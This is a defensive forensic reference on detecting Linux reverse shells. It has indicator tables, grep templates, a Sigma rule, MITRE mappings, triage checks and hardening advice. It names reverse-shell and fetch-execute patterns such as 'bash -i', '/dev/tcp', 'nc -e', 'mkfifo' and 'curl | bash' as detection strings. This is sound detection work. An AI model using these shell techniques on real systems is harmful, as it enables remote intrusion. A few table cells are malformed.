This note documents detection patterns related to Reverse Shell Execution on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Shell history | bash -i | Interactive shell redirection | Critical | Classic reverse shell pattern. |
| Shell history | /dev/tcp/ | Bash TCP socket shell | Critical | Very common manual shell technique. |
| Shell history | nc -e | Netcat command execution shell | Critical | High-confidence reverse shell indicator. |
| Shell history | mkfifo | FIFO shell construction | Critical | Common stealth shell pattern. |
| Shell history | python -c | Python inline reverse shell | Critical | Frequently used on Linux targets. |
| Shell history | perl -e | Perl reverse shell | High | Common on legacy systems. |
| Shell history | php -r | PHP shell execution | High | Often seen after web compromise. |
| Shell history | `curl | bash` | Remote payload execution | Critical |
| Shell history | wget -O- | Inline payload execution | Critical | Common delivery chain. |
auditd | execve of shell with socket utilities | Process execution evidence | Critical | Best attribution if enabled. |
auth.log / secure | shell after SSH or sudo | Reverse shell launched post-access | High | Correlate with session window. |
journalctl | suspicious shell invocation | Journald process visibility | High | Depends on logging config. |
| Network telemetry | outbound connection to uncommon IP | Reverse callback | Critical | Strong network confirmation. |
ss / netstat remnants | established outbound socket | Live shell evidence | Critical | Especially useful in live response. |
| EDR telemetry | shell parent-child anomaly | Process lineage | Critical | Detects shell spawned by web/app process. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| Shell launched immediately after web request | Web exploitation pivot | Critical | Common webshell-to-reverse-shell sequence. |
| Shell spawned by unusual parent | apache, nginx, www-data, tomcat | Critical | Strong exploitation signal. |
| Outbound connection to rare external host | Unexpected callback target | Critical | High-value beacon clue. |
| Reverse shell followed by user creation | Stabilization after foothold | Critical | Common attacker progression. |
| Reverse shell followed by sudo | Immediate escalation | Critical | Strong intrusion chain. |
| Temporary file then shell | Payload staging in /tmp, /dev/shm | High | Common staging behavior. |
| One-line interpreter execution | Minimal footprint shell | High | Suggests hands-on operator. |
| Connection on uncommon high port | Ad hoc callback | High | Often operator-controlled listener. |
| Short-lived shell bursts | Interactive operator reconnects | High | Common unstable shell behavior. |
| No shell history but network evidence | Non-interactive execution | High | Possible web or cron context. |
Common Tools
| Tool | Usage |
|---|---|
bash | Native shell redirection. |
nc / netcat | Socket-based shell delivery. |
socat | Advanced interactive reverse shell. |
python | Inline socket shell creation. |
perl | Legacy inline reverse shell. |
php | Common post-web compromise shell. |
openssl s_client | TLS shell tunneling. |
curl / wget | Payload fetch then execute. |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|---|---|---|
| Shell history | .bash_history, .zsh_history | Critical | Primary command evidence. |
| Audit logs | /var/log/audit/audit.log | Critical | Process-level execution. |
| Auth logs | /var/log/auth.log, /var/log/secure | High | Session context before shell. |
| Journald | journalctl | High | Process clues on some systems. |
| Network sockets | ss -tunap, netstat -tunap | Critical | Live callback evidence. |
| Temporary directories | /tmp, /var/tmp, /dev/shm | Critical | Stagers often remain here. |
| Web roots | /var/www, app dirs | High | Reverse shell may originate from web foothold. |
| Process tree | ps auxf | Critical | Parent-child shell lineage. |
| File timestamps | stat on payload files | High | Timeline anchor. |
MITRE ATT&CK References
- T1059 Command and Scripting Interpreter
- T1059.004 Unix Shell
- T1105 Ingress Tool Transfer
- T1071 Application Layer Protocol
Decision Tree
-
Is shell syntax present?
- Search for known reverse shell strings.
-
Which interpreter launched it?
- Bash, python, perl, php, nc, socat.
-
Which parent process exists?
- SSH, sudo, web server, cron, systemd.
-
Was outbound connection created?
- Identify destination IP and port.
-
Did shell lead to persistence?
- Inspect users, keys, cron, services.
-
Pivot
- Parent process → intrusion source.
- Destination IP → operator infra.
- Payload file → staging path.
-
Confirm shell
- Shell syntax + outbound socket + suspicious parent = high-confidence reverse shell.
Example Detection Templates
Grep
grep -R "bash -i\|/dev/tcp\|nc -e\|mkfifo\|python -c\|perl -e\|php -r" /home /root /tmp /var/tmp 2>/dev/null
grep -R "curl | bash\|wget -O-\|socat" /home /root /tmp /var/tmp 2>/dev/null
grep -R "bash -i" /home/*/.bash_history /root/.bash_history 2>/dev/null
Journalctl
journalctl | grep -E "bash|python|perl|nc|socat"
Network Inspection
ss -tunap
netstat -tunap
Sigma
title: Linux Reverse Shell Execution Indicators
id: linux-reverse-shell-execution
status: experimental
description: Detects common reverse shell syntax and suspicious shell execution indicators
logsource:
product: linux
detection:
selection_keywords:
message|contains:
- 'bash -i'
- '/dev/tcp'
- 'nc -e'
- 'mkfifo'
- 'python -c'
condition: selection_keywords
fields:
- message
- hostname
falsepositives:
- Rare admin troubleshooting
level: high
tags:
- attack.execution
- attack.t1059.004
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Egress filtering | Restrict outbound arbitrary connections | Critical | Stops callback channels. |
| Shell monitoring | Alert on shell spawned by service accounts | Critical | High-signal detection. |
| Auditd | Track execve and network-linked shell activity | High | Strong attribution. |
| Least privilege | Restrict interpreters for service users | High | Reduces shell options. |
| Web hardening | Prevent shell execution from app context | Critical | Major web compromise barrier. |
| Temp monitoring | Watch /tmp, /dev/shm, /var/tmp | High | Common staging zones. |
Fast Triage Checks
| Question | Command / Artifact | Why It Matters |
|---|---|---|
| Was shell syntax executed? | grep histories | Immediate confirmation. |
| Which parent process launched shell? | ps auxf | Determines intrusion source. |
| Is callback still active? | ss -tunap | Live shell detection. |
| Did shell touch temp files? | inspect temp dirs | Staging clue. |
| Was sudo used after shell? | grep sudo logs | Escalation chain. |
| Did persistence follow? | inspect keys, cron, users | Stabilization evidence. |
High Value Grep Strings
| Pattern | Why It Matters |
|---|---|
bash -i | Classic reverse shell. |
/dev/tcp | Bash socket shell. |
nc -e | Netcat shell. |
mkfifo | FIFO shell pattern. |
python -c | Inline interpreter shell. |
perl -e | Perl shell. |
php -r | PHP shell. |
| `curl | bash` |
wget -O- | Inline fetch-execute. |
socat | Advanced shell transport. |
Analyst Notes
| Scenario | Interpretation |
|---|---|
| Shell from web process | Likely exploitation chain. |
| Shell after SSH success | Operator moved from stable foothold into callback tooling. |
| Shell plus temp payload | Staged execution highly likely. |
| Outbound connection to rare IP | Strong callback evidence. |
| Reverse shell without history | Non-interactive context or cleanup likely. |
| Multiple shell syntaxes present | Operator fallback attempts. |